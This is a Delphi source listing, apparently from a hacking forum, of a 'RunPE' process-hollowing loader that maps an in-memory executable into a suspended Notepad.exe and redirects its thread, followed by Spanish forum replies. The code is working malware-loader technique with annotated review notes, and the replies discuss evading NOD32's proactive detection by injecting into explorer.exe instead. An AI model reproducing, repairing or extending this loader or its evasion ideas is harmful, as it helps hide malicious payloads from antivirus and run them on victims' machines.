unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs,unit2, StdCtrls;

type
  { Main window of the test harness. Button2 opens a file picker and writes
    the chosen path into Edit1; Button1 reads that file into the global
    bBuff and hands it to RunExe (Unit2). Memo1 is declared but is not
    referenced by any handler visible in this unit. }
  TForm1 = class(TForm)
    Button1: TButton;         // "run": FileToBytes + RunExe (see Button1Click)
    Edit1: TEdit;             // path of the PE file to load
    Button2: TButton;         // "browse": fills Edit1 from OpenDialog1
    Memo1: TMemo;             // not used by the visible code
    OpenDialog1: TOpenDialog;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  // Raw bytes of the file named in Edit1, filled by FileToBytes and passed
  // to RunExe. Because unit2 is listed after SysUtils in the uses clause,
  // TByteArray here is Unit2's dynamic array, not SysUtils.TByteArray.
  bBuff:  TByteArray;
implementation

{$R *.dfm}
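  function FileToBytes(sPath:string; var bFile:TByteArray):Boolean;
{ Read the whole file at sPath into bFile (a dynamic byte array).
  Returns True only when every byte was read. On any failure (cannot open,
  size query failed, short or failed read) the function returns False and
  leaves bFile empty, so a caller cannot act on a partially filled buffer.
  An empty file yields an empty array and returns True.
  Caveat: only the low 32 bits of the size are requested from GetFileSize,
  so files of 4 GiB or more are not handled correctly by this routine. }
var
  hFile:  THandle;
  dSize:  DWORD;
  dRead:  DWORD;
begin
  Result := FALSE;
  SetLength(bFile, 0);
  hFile := CreateFile(PChar(sPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
  if hFile = INVALID_HANDLE_VALUE then
    Exit;
  try
    dSize := GetFileSize(hFile, nil);
    // INVALID_FILE_SIZE ($FFFFFFFF) signals an error; the original passed
    // it straight to SetLength, i.e. a 4 GiB allocation request.
    if dSize = INVALID_FILE_SIZE then
      Exit;
    SetLength(bFile, dSize);
    if dSize = 0 then
    begin
      // Nothing to read; bFile[0] does not exist for an empty array.
      Result := TRUE;
      Exit;
    end;
    dRead := 0;
    // ReadFile's Boolean result must be checked: when it fails, dRead is
    // not meaningful, yet the original compared it against dSize anyway.
    if ReadFile(hFile, bFile[0], dSize, dRead, nil) and (dRead = dSize) then
      Result := TRUE
    else
      SetLength(bFile, 0);
  finally
    // Closed on every path (the original only closed after a successful open
    // but before checking the read; this also covers exceptions).
    CloseHandle(hFile);
  end;
end;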
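procedure TForm1.Button1Click(Sender: TObject);
{ Load the file named in Edit1 into bBuff and hand it to RunExe (Unit2).
  The original had no ';' after the FileToBytes call (it does not compile)
  and ignored both results, so a missing or unreadable file would have
  reached RunExe with whatever bBuff still held from an earlier click. }
begin
  if not FileToBytes(Edit1.Text, bBuff) then
  begin
    ShowMessage('Could not read file: ' + Edit1.Text);
    Exit;
  end;
  // Host process path is hard-coded; RunExe returns False when the buffer
  // does not carry DOS/NT signatures or the host could not be started.
  if not RunExe('C:\WINDOWS\Notepad.exe', bBuff) then
    ShowMessage('RunExe returned False');
end;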
procedure TForm1.Button2Click(Sender: TObject);
{ Let the user pick a file. The chosen path goes into Edit1, which is the
  input Button1Click later reads. Cancelling the dialog leaves Edit1 as is. }
begin
  if not OpenDialog1.Execute then
    Exit;
  Edit1.Text := OpenDialog1.FileName;
end;

end.
unit Unit2;
{
  Unit Name: uRunPE  
  Author: Anonymous 
  Description: Run Executables as Byte Arrays (process hollowing / "RunPE": a 32-bit PE image held in memory is mapped over a suspended host process, whose main thread is then redirected to the new entry point)
  Original: freevbcode.com/ShowCode.asp?ID=8385 
  Ported by: steve10120 
  Website: hackhound.org 
  History: First try 
} 
 
//UNIT
//unit uRunPE;

interface

uses Windows;

type
  // Dynamic byte array holding a raw PE image. This hides SysUtils.TByteArray
  // (a fixed-size array) in any unit that lists this unit after SysUtils.
  TByteArray = array of Byte;

// Start sVictim suspended and replace its image with the PE in bFile
// (process hollowing). x86/PE32 only; bFile is not bounds-checked -- see the
// review notes on the implementation before feeding it untrusted input.
function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
// Native (ntdll) API, not part of the documented Win32 surface: unmaps a
// section view at BaseAddress in another process and returns an NTSTATUS.
// RunEXE discards that status.
function NtUnmapViewOfSection(ProcessHandle: THandle; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll';

implementation

procedure Move(Destination, Source: Pointer; dLength:Cardinal);
{ Copy dLength bytes from Source^ to Destination^.
  NOTE: this hides System.Move inside this unit and takes its pointer
  arguments in the OPPOSITE order (destination first, like CopyMemory).
  Every unqualified Move call in this unit resolves here. No bounds or
  overlap checking; callers must guarantee both buffers are valid. }
begin
  System.Move(Source^, Destination^, dLength);
end;

function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
{ Process hollowing ("RunPE"): start sVictim suspended, replace its mapped
  image with the PE held in bFile, point the main thread at the new entry
  point and resume it. Returns True once ResumeThread has been called;
  False when the DOS or NT signature does not match, CreateProcess or
  GetThreadContext fails, or an exception is raised on the way.

  Review notes (the code itself is unchanged):
   * x86 / PE32 only: it reads and writes the 32-bit context (Ebx, Eax),
     copies a 248-byte TImageNtHeaders and patches a 4-byte image base.
   * bFile is never checked against Length(bFile). e_lfanew,
     PointerToRawData and SizeOfRawData come from the input and are used
     to index bFile directly, so a truncated or malformed PE reads out of
     bounds (access violation) instead of failing cleanly.
   * The results of ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx,
     WriteProcessMemory, VirtualProtectEx and SetThreadContext are ignored.
   * On success the handles in PI are never closed; on exception they are
     closed even if PI was never initialised, and a suspended host process
     (if one was created) is left alive rather than terminated.
   * Every section is left PAGE_EXECUTE_READWRITE (no W^X).
   * For defenders: CreateProcess(CREATE_SUSPENDED) -> NtUnmapViewOfSection
     -> VirtualAllocEx/WriteProcessMemory -> SetThreadContext/ResumeThread
     is the classic hollowing sequence that behavioural engines key on. }
var
  IDH:        TImageDosHeader;
  INH:        TImageNtHeaders;
  ISH:        TImageSectionHeader;
  PI:         TProcessInformation;
  SI:         TStartUpInfo;
  CONT:       TContext;
  ImageBase:  Pointer;
  Ret:        DWORD;
  i:          integer;
  Addr:       DWORD;
  dOffset:    DWORD;
begin
  Result := FALSE;
  try
    // 64-byte DOS header. With an empty bFile this dereferences nil.
    Move(@IDH, @bFile[0], 64);
    if IDH.e_magic = IMAGE_DOS_SIGNATURE then
    begin
      // e_lfanew is taken from the input without a bounds check.
      // 248 = SizeOf(TImageNtHeaders) for a PE32 image.
      Move(@INH, @bFile[IDH._lfanew], 248);
      if INH.Signature = IMAGE_NT_SIGNATURE then
      begin
        FillChar(SI, SizeOf(TStartupInfo),#0);
        FillChar(PI, SizeOf(TProcessInformation),#0);
        SI.cb := SizeOf(TStartupInfo);
        // The host is created suspended so its image can be swapped before
        // any of its own code runs.
        if CreateProcess(nil, PChar(sVictim), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
        begin
          CONT.ContextFlags := CONTEXT_FULL;
          if GetThreadContext(PI.hThread, CONT) then
          begin
            // Ebx+8 is treated as the slot holding the host's image base
            // (on x86 at first resume Ebx points at the PEB; PEB+8 is
            // ImageBaseAddress). The base is read into Addr.
            ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret);
            // NOTE(review): this passes the address of the LOCAL variable
            // Addr, not the remote base it contains (Ptr(Addr)); the
            // NTSTATUS is discarded as well, so a failed unmap is invisible.
            NtUnmapViewOfSection(PI.hProcess, @Addr);
            // Reserve+commit the payload's preferred ImageBase inside the
            // host. A nil result (base still occupied) is never checked.
            ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
            // Headers first, then each section at its virtual address.
            WriteProcessMemory(PI.hProcess, ImageBase, @bFile[0], INH.OptionalHeader.SizeOfHeaders, Ret);
            // Section table follows the NT headers; one entry is 40 bytes
            // (SizeOf(TImageSectionHeader)).
            dOffset := IDH._lfanew + 248;
            for i := 0 to INH.FileHeader.NumberOfSections - 1 do
            begin
              Move(@ISH, @bFile[dOffset + (i * 40)], 40);
              // PointerToRawData/SizeOfRawData are trusted as-is; no check
              // against Length(bFile) or SizeOfImage.
              WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), @bFile[ISH.PointerToRawData], ISH.SizeOfRawData, Ret);
              // Whole section made RWX regardless of its Characteristics.
              VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, @Addr);
            end;
            // Point the host's image-base slot at the new image (4 bytes).
            WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret);
            // Eax is used as the thread's start address (x86 new-process
            // convention at first resume) and redirected to the payload's
            // entry point.
            CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
            SetThreadContext(PI.hThread, CONT);
            ResumeThread(PI.hThread);
            Result := TRUE;
          end;
        end;
      end;
    end;
  except
    // Reached e.g. after an access violation while indexing bFile. PI is
    // uninitialised if the fault happened before the FillChar above, and
    // a suspended host process is not terminated, only its handles closed.
    CloseHandle(PI.hProcess);
    CloseHandle(PI.hThread);
  end;
end;

end.
Parezco malo, pero soy bueno
Aunque no domino Delphi, creo que va a ser de mucha utilidad. Gracias.
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
Sí, estoy viendo la proactiva de NOD32, pero esta inyección (RunPE) crea un proceso nuevo y se inyecta en él, lo que parece que NOD detecta, así que no sirve contra la proactiva.
Estoy probando traducir código C++ para inyectar en el proceso original explorer.exe; me parece que el secreto está en cómo se cargan las APIs en el proceso víctima y en el relocation base address (no es solo impresión mía: así lo explicó en 2010 Zero, de elhacker.net).

PD:
El 30% de CPU útil que le queda a mi Pentium 4 se lo están comiendo todos los access violations de esta prueba, jajaja.
Parezco malo, pero soy bueno
